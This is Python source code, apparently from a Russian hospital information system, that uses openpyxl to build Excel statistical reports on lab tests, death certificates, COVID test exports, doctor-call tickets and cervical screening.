patronymic, birthday, date_born, to_char(EXTRACT(YEAR from age(time_confirmation, date_born)), '999') as ind_age
:return:
"""
style_border_res = NamedStyle(name="style_border_res")
bd = Side(style='thin', color="000000")
style_border_res.border = Border(left=bd, top=bd, right=bd, bottom=bd)
style_border_res.font = Font(bold=False, size=11)
style_border_res.alignment = Alignment(wrap_text=True, horizontal='center', vertical='center')
r = 4
for res in researches:
r += 1
current_doc = res[5]
current_napr = res[0]
current_napr_atcreate = res[3]
current_date_confirm = res[1]
current_time_confirm = res[2]
current_ist_f = res[10]
current_coast = res[6]
current_how_many = res[8]
current_discount = res[7]
current_price_total = res[9]
current_ind_fio = f'{res[13]} {res[14]} {res[15]}'
current_born = res[16]
current_age = res[18]
current_num_card = res[12]
ws1.cell(row=r, column=1).value = current_doc
ws1.cell(row=r, column=2).value = f'{current_napr}, {current_napr_atcreate}'
ws1.cell(row=r, column=3).value = current_date_confirm
ws1.cell(row=r, column=4).value = current_time_confirm
ws1.cell(row=r, column=5).value = current_ist_f
ws1.cell(row=r, column=6).value = current_coast
ws1.cell(row=r, column=7).value = current_how_many
ws1.cell(row=r, column=8).value = current_discount
ws1.cell(row=r, column=9).value = current_price_total
ws1.cell(row=r, column=10).value = current_ind_fio
ws1.cell(row=r, column=11).value = current_born
ws1.cell(row=r, column=12).value = current_age
ws1.cell(row=r, column=13).value = current_num_card
ws1.cell(row=r, column=14).value = res[19]
rows = ws1[f'A{r}:M{r}']
for row in rows:
for cell in row:
cell.style = style_border_res
return ws1
def statistic_research_death_base(ws1, d1, d2, research_titile):
style_border = NamedStyle(name="style_border")
bd = Side(style='thin', color="000000")
style_border.border = Border(left=bd, top=bd, right=bd, bottom=bd)
style_border.font = Font(bold=True, size=11)
style_border.alignment = Alignment(wrap_text=True, horizontal='center', vertical='center')
ws1.cell(row=1, column=1).value = 'Услуга:'
ws1.cell(row=1, column=2).value = research_titile
ws1.cell(row=2, column=1).value = 'Период:'
ws1.cell(row=3, column=1).value = f'c {d1} по {d2}'
columns = [
('Серия', 13),
('Номер', 15),
('Вид МСС', 17),
('Медицинская организация выдавшая свидететельство', 18),
('Прикрепление пациента', 18),
('Участок', 10),
('Дата смерти', 11),
('Дата рождения', 11),
('ФИО умершего пациента', 25),
('Пол (м/ж)', 6),
('Возраст на дату смерти', 6),
('а) болезнь или состояние, непосредст-венно приведшее к смерти', 17),
('а) период', 10),
('а) Код по МКБ- 10', 9),
('б) патологи-ческое состояние, которое привело к болезни или состоянию, непосредст-венно приведшее к смерти', 17),
('б) период', 10),
('б) Код по МКБ- 10', 9),
('в) перво-начальная причина смерти', 17),
('в) период', 10),
('в) Код по МКБ- 10', 9),
('г) внешняя причина при травмах и отравлениях', 17),
('г) период', 10),
('г) Код по МКБ- 10', 9),
('II.Прочие важные состояния способствовавшие смерти', 15),
('класс заболевания первоначальной причины смерти', 15),
('Место смерти (1/0)', 15),
('Название стационара', 15),
('ДТП (1/0)', 12),
('Материнская смертность (1/0)', 15),
('ФИО выдавшего свидетельства', 20),
('Тип места смерти', 25),
('ОКПО', 16),
('ОКАТО', 16),
('Экспертиза', 35),
]
for idx, column in enumerate(columns, 1):
ws1.cell(row=4, column=idx).value = column[0]
ws1.column_dimensions[get_column_letter(idx)].width = column[1]
ws1.cell(row=4, column=idx).style = style_border
return ws1
def statistic_reserved_research_death_base(ws1, d1, d2, research_titile):
style_border = NamedStyle(name="style_border_rz")
bd = Side(style='thin', color="000000")
style_border.border = Border(left=bd, top=bd, right=bd, bottom=bd)
style_border.font = Font(bold=True, size=11)
style_border.alignment = Alignment(wrap_text=True, horizontal='center', vertical='center')
ws1.cell(row=1, column=1).value = 'Услуга:'
ws1.cell(row=1, column=2).value = research_titile
ws1.cell(row=2, column=1).value = 'Период:'
ws1.cell(row=3, column=1).value = f'c {d1} по {d2}'
columns = [
('Медицинская организация', 40),
('Номер в резерве', 20),
('Дата создания', 22),
('<NAME>', 35),
('Направление', 20),
]
for idx, column in enumerate(columns, 1):
ws1.cell(row=4, column=idx).value = column[0]
ws1.column_dimensions[get_column_letter(idx)].width = column[1]
ws1.cell(row=4, column=idx).style = style_border
return ws1
def statistic_research_death_base_card(ws1, d1, d2, research_titile):
style_border = NamedStyle(name="style_border_ca")
bd = Side(style='thin', color="000000")
style_border.border = Border(left=bd, top=bd, right=bd, bottom=bd)
style_border.font = Font(bold=True, size=11)
style_border.alignment = Alignment(wrap_text=True, horizontal='center', vertical='center')
ws1.cell(row=1, column=1).value = 'Услуга:'
ws1.cell(row=1, column=2).value = research_titile
ws1.cell(row=2, column=1).value = 'Период:'
ws1.cell(row=3, column=1).value = f'c {d1} по {d2}'
columns = [
('Серия', 13),
('Номер', 15),
('Вид МСС', 17),
('Медицинская организация выдавшая свидететельство', 18),
('Прикрепление пациента', 18),
('Участок', 10),
('Дата смерти', 11),
('Дата рождения', 11),
('ФИО умершего пациента', 25),
('Пол (м/ж)', 6),
('Возраст на дату смерти', 6),
('а) болезнь или состояние, непосредст-венно приведшее к смерти', 17),
('а) период', 10),
('а) Код по МКБ- 10', 9),
('б) патологи-ческое состояние, которое привело к болезни или состоянию, непосредст-венно приведшее к смерти', 17),
('б) период', 10),
('б) Код по МКБ- 10', 9),
('в) перво-начальная причина смерти', 17),
('в) период', 10),
('в) Код по МКБ- 10', 9),
('г) внешняя причина при травмах и отравлениях', 17),
('г) период', 10),
('г) Код по МКБ- 10', 9),
('II.Прочие важные состояния способствовавшие смерти', 15),
('класс заболевания первоначальной причины смерти', 15),
('Место смерти (1/0)', 15),
('Название стационара', 15),
('ДТП (1/0)', 12),
('Материнская смертность (1/0)', 15),
('ФИО выдавшего свидетельства', 20),
('Тип места смерти', 25),
('ОКПО', 16),
('ОКАТО', 16),
('Экспертиза', 35),
]
for idx, column in enumerate(columns, 1):
ws1.cell(row=4, column=idx).value = column[0]
ws1.column_dimensions[get_column_letter(idx)].width = column[1]
ws1.cell(row=4, column=idx).style = style_border
return ws1
def statistic_research_death_data(ws1, researches, expertise_final_data):
"""
:return:
"""
style_border_res = NamedStyle(name="style_border_res")
bd = Side(style='thin', color="000000")
style_border_res.border = Border(left=bd, top=bd, right=bd, bottom=bd)
style_border_res.font = Font(bold=False, size=11)
style_border_res.alignment = Alignment(wrap_text=True, horizontal='center', vertical='center')
r = 4
for i in researches:
if not i:
return ws1
try:
type_doc_death = i["Вид медицинского свидетельства о смерти"]["title"]
except:
type_doc_death = i.get("Вид медицинского свидетельства о смерти", "")
if not type_doc_death:
continue
r += 1
ws1.cell(row=r, column=1).value = i["Серия"]
ws1.cell(row=r, column=2).value = i["Номер"]
ws1.cell(row=r, column=3).value = type_doc_death
ws1.cell(row=r, column=4).value = i["hosp_title"]
mo_attachment, mo_district = "-", "-"
if i.get("Прикрепление", None):
attachment_data = i.get("Прикрепление").split("—")
mo_attachment = HOSPITAL_TITLE_BY_CODE_TFOMS.get(attachment_data[0].strip(), attachment_data[0].strip())
mo_district = attachment_data[1]
ws1.cell(row=r, column=5).value = mo_attachment
ws1.cell(row=r, column=6).value = mo_district
ws1.cell(row=r, column=7).value = normalize_dash_date(i["Дата смерти"])
ws1.cell(row=r, column=8).value = i["Дата рождения"]
ws1.cell(row=r, column=9).value = i["fio_patient"]
ws1.cell(row=r, column=10).value = i["sex"]
d1 = du_parse(i["Дата смерти"])
try:
d2 = du_parse(i["Дата рождения"])
delta = relativedelta(d1, d2)
ws1.cell(row=r, column=11).value = delta.years
except:
ws1.cell(row=r, column=11).value = "-"
# а)
diag_data = get_table_diagnos(i, "а) Болезнь или состояние, непосредственно приведшее к смерти")
ws1.cell(row=r, column=12).value = f'{diag_data[1]["code"]} {diag_data[1]["title"]}'
ws1.cell(row=r, column=13).value = diag_data[0]
ws1.cell(row=r, column=14).value = diag_data[1]["code"]
# б)
diag_data = get_table_diagnos(i, "б) патологическое состояние, которое привело к возникновению вышеуказанной причины:")
ws1.cell(row=r, column=15).value = f'{diag_data[1]["code"]} {diag_data[1]["title"]}'
ws1.cell(row=r, column=16).value = diag_data[0]
ws1.cell(row=r, column=17).value = diag_data[1]["code"]
# в)
diag_data = get_table_diagnos(i, "в) первоначальная причина смерти:")
ws1.cell(row=r, column=18).value = f'{diag_data[1]["code"]} {diag_data[1]["title"]}'
ws1.cell(row=r, column=19).value = diag_data[0]
ws1.cell(row=r, column=20).value = diag_data[1]["code"]
# г)
diag_data = get_table_diagnos(i, "г) внешняя причина при травмах и отравлениях:")
ws1.cell(row=r, column=21).value = f'{diag_data[1]["code"]} {diag_data[1]["title"]}'
ws1.cell(row=r, column=22).value = diag_data[0]
ws1.cell(row=r, column=23).value = diag_data[1]["code"]
diag_data = get_table_diagnos(i, "II. Прочие важные состояния, способствовавшие смерти, но не связанные с болезнью или патологическим состоянием, приведшим к ней")
ws1.cell(row=r, column=24).value = f'{diag_data[1]["code"]} {diag_data[1]["title"]} {diag_data[0]}'
ws1.cell(row=r, column=25).value = ""
place_death_details = ""
try:
place_death_details = json.loads(i["Место смерти"])
is_dict = True
except:
is_dict = False
if not is_dict:
try:
place_death_details = i["Место смерти"].get("address", None)
is_dict = True
except:
is_dict = False
if not is_dict:
place_death_details = "-"
ws1.cell(row=r, column=26).value = place_death_details
# Название стационара
ws1.cell(row=r, column=27).value = i.get("МО", "")
# ДТП
ws1.cell(row=r, column=28).value = i["ДТП"]
ws1.cell(row=r, column=29).value = i["Беременность"]
if i.get("Заполнил", None):
who_write = i.get("Заполнил")
else:
who_write = ""
ws1.cell(row=r, column=30).value = who_write
ws1.cell(row=r, column=31).value = ""
ws1.cell(row=r, column=32).value = ""
ws1.cell(row=r, column=33).value = ""
experise = ""
if expertise_final_data.get(i.get('issledovaniye_id', ""), ""):
experise = expertise_final_data.get(i.get('issledovaniye_id', ""), "")
ws1.cell(row=r, column=34).value = experise
rows = ws1[f'A{r}:AH{r}']
for row in rows:
for cell in row:
cell.style = style_border_res
return ws1
def statistic_research_death_data_card(ws1, researches):
"""
:return:
"""
style_border_res = NamedStyle(name="style_border_res_ca")
bd = Side(style='thin', color="000000")
style_border_res.border = Border(left=bd, top=bd, right=bd, bottom=bd)
style_border_res.font = Font(bold=False, size=11)
style_border_res.alignment = Alignment(wrap_text=True, horizontal='center', vertical='center')
r = 4
for i in researches:
if not i:
return ws1
try:
type_doc_death = i["Вид медицинского свидетельства о смерти"]["title"]
except:
type_doc_death = i.get("Вид медицинского свидетельства о смерти", "")
if not type_doc_death:
continue
r += 1
ws1.cell(row=r, column=1).value = i["Серия"]
ws1.cell(row=r, column=2).value = i["Номер"]
ws1.cell(row=r, column=3).value = type_doc_death
ws1.cell(row=r, column=4).value = i["hosp_title"]
mo_attachment, mo_district = "-", "-"
if i.get("Прикрепление", None):
attachment_data = i.get("Прикрепление").split("—")
mo_attachment = HOSPITAL_TITLE_BY_CODE_TFOMS.get(attachment_data[0].strip(), attachment_data[0].strip())
mo_district = attachment_data[1]
ws1.cell(row=r, column=5).value = mo_attachment
ws1.cell(row=r, column=6).value = mo_district
ws1.cell(row=r, column=7).value = normalize_dash_date(i["Дата смерти"])
ws1.cell(row=r, column=8).value = i["Дата рождения"]
ws1.cell(row=r, column=9).value = i["fio_patient"]
ws1.cell(row=r, column=10).value = i["sex"]
d1 = du_parse(i["Дата смерти"])
try:
d2 = du_parse(i["Дата рождения"])
delta = relativedelta(d1, d2)
ws1.cell(row=r, column=11).value = delta.years
except:
ws1.cell(row=r, column=11).value = "-"
# а)
diag_data = get_table_diagnos(i, "а) Болезнь или состояние, непосредственно приведшее к смерти")
ws1.cell(row=r, column=12).value = f'{diag_data[1]["code"]} {diag_data[1]["title"]}'
ws1.cell(row=r, column=13).value = diag_data[0]
ws1.cell(row=r, column=14).value = diag_data[1]["code"]
# б)
diag_data = get_table_diagnos(i, "б) патологическое состояние, которое привело к возникновению вышеуказанной причины:")
ws1.cell(row=r, column=15).value = f'{diag_data[1]["code"]} {diag_data[1]["title"]}'
ws1.cell(row=r, column=16).value = diag_data[0]
ws1.cell(row=r, column=17).value = diag_data[1]["code"]
# в)
diag_data = get_table_diagnos(i, "в) первоначальная причина смерти:")
ws1.cell(row=r, column=18).value = f'{diag_data[1]["code"]} {diag_data[1]["title"]}'
ws1.cell(row=r, column=19).value = diag_data[0]
ws1.cell(row=r, column=20).value = diag_data[1]["code"]
# г)
diag_data = get_table_diagnos(i, "г) внешняя причина при травмах и отравлениях:")
ws1.cell(row=r, column=21).value = f'{diag_data[1]["code"]} {diag_data[1]["title"]}'
ws1.cell(row=r, column=22).value = diag_data[0]
ws1.cell(row=r, column=23).value = diag_data[1]["code"]
diag_data = get_table_diagnos(i, "II. Прочие важные состояния, способствовавшие смерти, но не связанные с болезнью или патологическим состоянием, приведшим к ней")
ws1.cell(row=r, column=24).value = f'{diag_data[1]["code"]} {diag_data[1]["title"]} {diag_data[0]}'
ws1.cell(row=r, column=25).value = ""
place_death_details = ""
try:
place_death_details = json.loads(i["Место смерти"])
is_dict = True
if is_dict:
place_death_details = place_death_details.get("address", "-")
except:
is_dict = False
if not is_dict:
try:
place_death_details = i["Место смерти"].get("address", None)
is_dict = True
except:
is_dict = False
if not is_dict:
place_death_details = "-"
ws1.cell(row=r, column=26).value = place_death_details
# Название стационара
ws1.cell(row=r, column=27).value = i.get("МО", "")
# ДТП
ws1.cell(row=r, column=28).value = i["ДТП"]
ws1.cell(row=r, column=29).value = i["Беременность"]
if i.get("Заполнил", None):
who_write = i.get("Заполнил")
else:
who_write = ""
ws1.cell(row=r, column=30).value = who_write
try:
type_where_death = i["Типы мест наступления смерти"]["title"]
except:
type_where_death = "-"
ws1.cell(row=r, column=31).value = type_where_death
ws1.cell(row=r, column=32).value = i["hosp_okpo"]
ws1.cell(row=r, column=33).value = i["hosp_okato"]
rows = ws1[f'A{r}:AG{r}']
for row in rows:
for cell in row:
cell.style = style_border_res
return ws1
def statistic_reserved_research_death_data(ws1, researches):
"""
:return:
"""
style_border_res = NamedStyle(name="style_border_res_rz")
bd = Side(style='thin', color="000000")
style_border_res.border = Border(left=bd, top=bd, right=bd, bottom=bd)
style_border_res.font = Font(bold=False, size=11)
style_border_res.alignment = Alignment(wrap_text=True, horizontal='center', vertical='center')
r = 4
for i in researches:
if not i:
return ws1
r += 1
if not i.get("Номер", ""):
continue
ws1.cell(row=r, column=1).value = i.get("hosp_title", "")
ws1.cell(row=r, column=2).value = i.get("Номер", "")
ws1.cell(row=r, column=3).value = i.get("date_create", "")
ws1.cell(row=r, column=4).value = i.get("fio_patient", "")
ws1.cell(row=r, column=5).value = i.get("napravleniye_id", "")
rows = ws1[f'A{r}:E{r}']
for row in rows:
for cell in row:
cell.style = style_border_res
return ws1
def statistic_research_by_covid_base(ws1, d1, d2, research_titile):
style_border = NamedStyle(name="style_border")
bd = Side(style='thin', color="000000")
style_border.border = Border(left=bd, top=bd, right=bd, bottom=bd)
style_border.font = Font(bold=True, size=11)
style_border.alignment = Alignment(wrap_text=True, horizontal='center', vertical='center')
columns = [
("№ заказа", 23),
("Название организации", 33),
("ОГРН организации", 33),
("Дата заказа", 23),
("Код услуги", 33),
("Название услуги", 33),
("Тест-система", 13),
("Дата взятия биоматериала", 13),
("Дата готовности результата", 13),
("Результат", 13),
("Тип исследования", 13),
("Значение результата", 33),
("Фамилия", 33),
("Имя", 33),
("Отчество", 33),
("Пол", 8),
("Дата рождения", 13),
("Телефон", 13),
("e-mail", 13),
("Тип ДУЛ", 13),
("Номер документа", 13),
("Серия документа", 13),
("СНИЛС", 23),
("ОМС", 23),
("Адрес регистрации регион", 23),
("Адрес регистрации район", 23),
("Адрес регистрации город", 23),
("Адрес регистрации улица", 23),
("Адрес регистрации дом", 23),
("Адрес регистрации строение", 23),
("Адрес регистрации квартира", 23),
("Адрес факт регион", 23),
("Адрес факт район", 23),
("Адрес факт город", 23),
("Адрес факт улица", 23),
("Адрес факт дом", 23),
("Адрес факт строение", 23),
("Адрес факт квартира", 23),
("Название лаборатории", 23),
("ОГРН лаборатории", 23),
]
for idx, column in enumerate(columns, 1):
ws1.cell(row=1, column=idx).value = column[0]
ws1.column_dimensions[get_column_letter(idx)].width = column[1]
ws1.cell(row=1, column=idx).style = style_border
return ws1
def statistic_research_by_covid_data(ws1, result_patient, patient_docs):
"""
:return:
"""
style_border_res = NamedStyle(name="style_border_res")
bd = Side(style='thin', color="000000")
style_border_res.border = Border(left=bd, top=bd, right=bd, bottom=bd)
style_border_res.font = Font(bold=False, size=11)
style_border_res.alignment = Alignment(wrap_text=True, horizontal='center', vertical='center')
r = 1
if not result_patient:
return ws1
for i in result_patient:
r += 1
ws1.cell(row=r, column=1).value = i.dir_id
ws1.cell(row=r, column=2).value = i.hosp_title
ws1.cell(row=r, column=3).value = i.hosp_ogrn
ws1.cell(row=r, column=4).value = i.date_create
ws1.cell(row=r, column=5).value = i.research_code
ws1.cell(row=r, column=6).value = i.research_title
ws1.cell(row=r, column=7).value = ""
ws1.cell(row=r, column=8).value = i.date_reciev
ws1.cell(row=r, column=9).value = i.date_confirm
if i.value and i.method_title != "ИФА":
val_param = 0 if 'отриц' in i.value.lower() else 1
result_val = ""
else:
result_val = i.value
val_param = ""
ws1.cell(row=r, column=10).value = val_param
method_val = 2 if i.method_title == "ИФА" else 1
ws1.cell(row=r, column=11).value = method_val
ws1.cell(row=r, column=12).value = result_val
ws1.cell(row=r, column=13).value = i.family
ws1.cell(row=r, column=14).value = i.name
ws1.cell(row=r, column=15).value = i.patronymic
ws1.cell(row=r, column=16).value = 1 if i.sex.lower() == "м" else 2
ws1.cell(row=r, column=17).value = i.born
ws1.cell(row=r, column=18).value = ""
ws1.cell(row=r, column=19).value = ""
patient_doc = patient_docs.get(i.client_id, None)
type, serial, number, snils, polis = "", "", "", "", ""
if patient_doc:
for pat_doc in patient_doc:
for k, v in pat_doc.items():
if k == "снилс":
snils = v
elif k == "полис":
polis = v
elif "паспорт" in k.lower() or "рождение" in k.lower():
k_value = "Паспорт гражданина РФ" if "паспорт" in k.lower() else k
type = k_value
data = v.split("@")
serial = data[0]
number = data[1]
ws1.cell(row=r, column=20).value = type
ws1.cell(row=r, column=21).value = number
ws1.cell(row=r, column=22).value = serial
ws1.cell(row=r, column=23).value = snils
ws1.cell(row=r, column=24).value = polis
ws1.cell(row=r, column=25).value = "Иркутская область"
ws1.cell(row=r, column=39).value = i.hosp_title
ws1.cell(row=r, column=40).value = i.hosp_ogrn
rows = ws1[f'A{r}:C{r}']
for row in rows:
for cell in row:
cell.style = style_border_res
return ws1
def statistic_research_by_sum_lab_base(ws1, d1, d2, research_titile):
style_border = NamedStyle(name="style_border")
bd = Side(style='thin', color="000000")
style_border.border = Border(left=bd, top=bd, right=bd, bottom=bd)
style_border.font = Font(bold=True, size=11)
style_border.alignment = Alignment(wrap_text=True, horizontal='center', vertical='center')
ws1.cell(row=1, column=2).value = research_titile
ws1.cell(row=2, column=1).value = 'Период:'
ws1.cell(row=3, column=1).value = f'c {d1} по {d2}'
columns = [
('Лаборатория', 33),
('Услуга', 55),
('Кол-во', 25),
]
for idx, column in enumerate(columns, 1):
ws1.cell(row=4, column=idx).value = column[0]
ws1.column_dimensions[get_column_letter(idx)].width = column[1]
ws1.cell(row=4, column=idx).style = style_border
return
def statistic_research_by_sum_lab_data(ws1, researches):
"""
:return:
"""
style_border_res = NamedStyle(name="style_border_res")
bd = Side(style='thin', color="000000")
style_border_res.border = Border(left=bd, top=bd, right=bd, bottom=bd)
style_border_res.font = Font(bold=False, size=11)
style_border_res.alignment = Alignment(wrap_text=True, horizontal='center', vertical='center')
r = 4
if not researches:
return ws1
for i in researches:
r += 1
ws1.cell(row=r, column=1).value = i.lab_title
ws1.cell(row=r, column=2).value = i.research_title
ws1.cell(row=r, column=3).value = i.sum_research_id
rows = ws1[f'A{r}:C{r}']
for row in rows:
for cell in row:
cell.style = style_border_res
return ws1
def statistic_research_by_details_lab_base(ws1, d1, d2, research_titile):
style_border = NamedStyle(name="style_border")
bd = Side(style='thin', color="000000")
style_border.border = Border(left=bd, top=bd, right=bd, bottom=bd)
style_border.font = Font(bold=True, size=11)
style_border.alignment = Alignment(wrap_text=True, horizontal='center', vertical='center')
ws1.cell(row=1, column=2).value = research_titile
ws1.cell(row=2, column=1).value = 'Период:'
ws1.cell(row=3, column=1).value = f'c {d1} по {d2}'
columns = [
('ID', 23),
('лаборатория', 15),
('анализ', 35),
('дата', 15),
('время', 15),
('аппарат', 15),
('дата взятия', 15),
('время взятия', 15),
]
for idx, column in enumerate(columns, 1):
ws1.cell(row=4, column=idx).value = column[0]
ws1.column_dimensions[get_column_letter(idx)].width = column[1]
ws1.cell(row=4, column=idx).style = style_border
return ws1
def statistic_research_by_details_lab_data(ws1, researches):
"""
:return:
"""
style_border_res = NamedStyle(name="style_border_res")
bd = Side(style='thin', color="000000")
style_border_res.border = Border(left=bd, top=bd, right=bd, bottom=bd)
style_border_res.font = Font(bold=False, size=11)
style_border_res.alignment = Alignment(wrap_text=True, horizontal='center', vertical='center')
r = 4
if not researches:
return ws1
for i in researches:
r += 1
ws1.cell(row=r, column=1).value = i.napravleniye_id if i.napravleniye_id else ""
ws1.cell(row=r, column=2).value = i.lab_title if i.lab_title else ""
ws1.cell(row=r, column=3).value = i.research_title if i.research_title else ""
ws1.cell(row=r, column=4).value = i.date_confirm if i.date_confirm else ""
ws1.cell(row=r, column=5).value = i.time_confirm if i.time_confirm else ""
ws1.cell(row=r, column=6).value = i.name if i.name else ""
ws1.cell(row=r, column=7).value = i.date_tubes if i.date_tubes else ""
ws1.cell(row=r, column=8).value = i.time_tubes if i.time_tubes else ""
rows = ws1[f'A{r}:H{r}']
for row in rows:
for cell in row:
cell.style = style_border_res
return ws1
def statistic_message_ticket_base(ws1, d1, d2, style_border):
ws1.cell(row=1, column=1).value = 'Обращения'
ws1.cell(row=2, column=1).value = 'Период:'
ws1.cell(row=3, column=1).value = f'c {d1} по {d2}'
columns = [
('МО', 20),
('Номер', 20),
('Создано', 15),
('Физ. лицо', 26),
('Телефон', 20),
('Адрес', 20),
('Цель', 20),
('Примечания', 26),
('Статус', 16),
('Источник', 16),
('Создатель', 26),
]
for idx, column in enumerate(columns, 1):
ws1.cell(row=4, column=idx).value = column[0]
ws1.column_dimensions[get_column_letter(idx)].width = column[1]
ws1.cell(row=4, column=idx).style = style_border
return ws1
def statistic_message_ticket_data(ws1, message_ticket_sql, style_border_res):
r = 4
purposes = dict(DoctorCall.PURPOSES)
statuses = dict(DoctorCall.STATUS)
for ticket in message_ticket_sql:
r += 1
ws1.cell(row=r, column=1).value = ticket.hospital_short_title or ticket.hospital_title
ws1.cell(row=r, column=2).value = ticket.external_num or ticket.num
ws1.cell(row=r, column=3).value = ticket.date_create
ws1.cell(row=r, column=4).value = f'{ticket.family} {ticket.name} {ticket.patronymic}'
ws1.cell(row=r, column=5).value = ticket.phone
ws1.cell(row=r, column=6).value = ticket.address
ws1.cell(row=r, column=7).value = purposes.get(ticket.purpose, '')
ws1.cell(row=r, column=8).value = ticket.comment
ws1.cell(row=r, column=9).value = statuses.get(ticket.status, '')
ws1.cell(row=r, column=10).value = 'интернет' if statuses.get(ticket.is_external) else 'оператор'
who_create = ""
if ticket.fio and ticket.short_title:
who_create = f"{ticket.fio}-{ticket.short_title}"
ws1.cell(row=r, column=11).value = who_create
rows = ws1[f'A{r}:K{r}']
for row in rows:
for cell in row:
cell.style = style_border_res
return ws1
def statistic_message_purpose_total_data(ws1, message_total, d1, d2, style_border_res):
ws1.cell(row=1, column=1).value = 'Обращения'
ws1.cell(row=2, column=1).value = 'Период:'
ws1.cell(row=3, column=1).value = f'c {d1} по {d2}'
columns = [
('Цель', 20),
('Всего', 20),
('Выполнено', 20),
]
for idx, column in enumerate(columns, 1):
ws1.cell(row=5, column=idx).value = column[0]
ws1.column_dimensions[get_column_letter(idx)].width = column[1]
ws1.cell(row=5, column=idx).style = style_border_res
r = 5
r1 = r
purposes = dict(DoctorCall.PURPOSES)
for p in message_total:
r += 1
ws1.cell(row=r, column=1).value = purposes.get(p.total_purpose, '')
ws1.cell(row=r, column=2).value = p.sum_total_purpose
ws1.cell(row=r, column=3).value = p.sum_execute_purpose or ''
rows = ws1[f'A{r}:C{r}']
for row in rows:
for cell in row:
cell.style = style_border_res
ws1.cell(row=r + 1, column=1).value = 'Итого'
ws1.cell(row=r + 1, column=1).style = style_border_res
ws1.cell(row=r + 1, column=2).value = f'=SUM(B{r1 + 1}:B{r})'
ws1.cell(row=r + 1, column=2).style = style_border_res
ws1.cell(row=r + 1, column=3).value = f'=SUM(C{r1 + 1}:C{r})'
ws1.cell(row=r + 1, column=3).style = style_border_res
return ws1
def statistic_screening_month_data(ws1, data, month, year, style_border_res):
ws1.cell(row=1, column=1).value = 'Скрининг'
ws1.cell(row=2, column=1).value = 'Период:'
ws1.cell(row=2, column=2).value = f'{month_dict[int(month)]}-{year}'
size = 12
columns = [
('Месяц', 10),
('Число женщин 18-69 лет, проживающих на прикрепленной территории', size),
('Число женщин 30 -65 лет, подлежащих скринингу (всего)', size),
('Число женщин 30 -65 лет, подлежащих скринингу при диспансеризации', size),
('Число женщин 30-65 лет, прошедших скрининг', size),
('Число женщин 30 -65 лет, подлежащих скринингу при диспансеризации', size),
('Число женщин, которым выполнен ПАП-тест от общего числа прошедших скрининг', size),
('Число женщин, по препаратам которых получили цитологический результат', size),
('Из них, препараты признаны адекватными', size),
('Недостаточно адекватными', size),
('Не адекватными', size),
('Из числа женщин с недостаточно адекватным, неадекватным результатом, число вызванных женщин, у которых повторно взят материал на цитологическое исследование', size),
('В т.ч. АSCUS', size),
('В т.ч. легкое интраэпителиальное поражение CIN I, признаки ВПЧ', size),
('Умеренное интраэпителиальное поражение CIN I-II, II', size),
('Тяжелое интраэпителиальное поражение CIN II-III, III', size),
('cr in situ', size),
('Подозрение на ЗНО шейки матки', size),
('Всего по Папа-Николау', size),
]
for idx, column in enumerate(columns, 1):
ws1.cell(row=5, column=idx).value = column[0]
ws1.column_dimensions[get_column_letter(idx)].width = column[1]
ws1.cell(row=5, column=idx).style = style_border_res
ws1.cell(row=6, column=1).value = f'{month_dict[int(month)]}'
ws1.cell(row=6, column=1).style = style_border_res
for k, v in data.items():
if k == "attached_count_age_for_month":
ws1.cell(row=6, column=2).value = v
ws1.cell(row=6, column=2).style = style_border_res
if k == "count_regplan_for_month":
ws1.cell(row=6, column=3).value = v
ws1.cell(row=6, column=3).style = style_border_res
if k == "count_dispensarization_from_screening":
ws1.cell(row=6, column=4).value = v
ws1.cell(row=6, column=4).style = style_border_res
if k == "pass_screening":
ws1.cell(row=6, column=5).value = v
ws1.cell(row=6, column=5).style = style_border_res
if k == "pass_screening_in_dispensarization":
ws1.cell(row=6, column=6).value = v
ws1.cell(row=6, column=6).style = style_border_res
if k == "pass_pap_analysis":
ws1.cell(row=6, column=7).value = v
ws1.cell(row=6, column=7).style = style_border_res
if k == "pass_pap_adequate_result_value":
ws1.cell(row=6, column=9).value = v
ws1.cell(row=6, column=9).style = style_border_res
if k == "pass_pap_not_enough_adequate_result_value":
ws1.cell(row=6, column=10).value = v
ws1.cell(row=6, column=10).style = style_border_res
if k == "pass_pap_not_adequate_result_value":
ws1.cell(row=6, column=11).value = v
ws1.cell(row=6, column=11).style = style_border_res
if k == "count_people_dublicate":
ws1.cell(row=6, column=12).value = v
ws1.cell(row=6, column=12).style = style_border_res
if k == "pass_pap_ascus_result_value":
ws1.cell(row=6, column=13).value = v
ws1.cell(row=6, column=13).style = style_border_res
if k == "pass_pap_cin_i_result_value":
ws1.cell(row=6, column=14).value = v
ws1.cell(row=6, column=14).style = style_border_res
if k == "pass_pap_cin_i_ii_result_value":
ws1.cell(row=6, column=15).value = v
ws1.cell(row=6, column=15).style = style_border_res
if k == "pass_pap_cin_ii_iii_result_value":
ws1.cell(row=6, column=16).value = v
ws1.cell(row=6, column=16).style = style_border_res
if k == "pass_pap_cr_in_situ_result_value":
ws1.cell(row=6, column=17).value = v
ws1.cell(row=6, column=17).style = style_border_res
if k == "count_pap_analysys":
ws1.cell(row=6, column=19).value = v
ws1.cell(row=6, column=19).style = style_border_res
return ws1
def get_table_diagnos(diagnos_data, item):
diag_details = {}
period_data = ""
try:
diagnos_data[item].keys()
diag_data = diagnos_data[item]
except:
diag_data = json.loads(diagnos_data[item])
try:
diag_details = json.loads(diag_data["rows"][0][2])
period_data = f'{diag_data["rows"][0][0]} {diag_data["rows"][0][1]}'
is_dict = True
except:
is_dict = False
if not is_dict:
diag_details["code"] = "-"
diag_details["title"] = "-"
period_data = "-"
return (period_data, diag_details)
|
import json
from collections import OrderedDict
import openpyxl
from openpyxl.styles import Border, Side, Alignment, Font, NamedStyle
from openpyxl.utils.cell import get_column_letter
from directions.models import IstochnikiFinansirovaniya
from doctor_call.models import DoctorCall
from hospitals.tfoms_hospital import HOSPITAL_TITLE_BY_CODE_TFOMS
from utils.dates import normalize_dash_date
from dateutil.parser import parse as du_parse
from dateutil.relativedelta import relativedelta
month_dict = {1: 'Январь', 2: 'Февраль', 3: 'Март', 4: 'Апрель', 5: 'Май', 6: 'Июнь', 7: 'Июль', 8: 'Август', 9: 'Сентябрь', 10: 'Октябрь', 11: 'Ноябрь', 12: 'Декабрь'}
def job_total_base(ws1, month, type_fin):
"""
Основа(каркас) для итоговых данных
:return:
"""
ws1.column_dimensions[get_column_letter(1)].width = 22
for i in range(1, 32):
ws1.column_dimensions[get_column_letter(1 + i)].width = 4
ws1.cell(row=4, column=1 + i).value = str(i)
ws1.cell(row=1, column=1).value = 'Месяц'
ws1.cell(row=1, column=2).value = month_dict.get(month)
ws1.cell(row=4, column=1).value = 'Вид работы'
fin_obj = IstochnikiFinansirovaniya.objects.get(pk=type_fin)
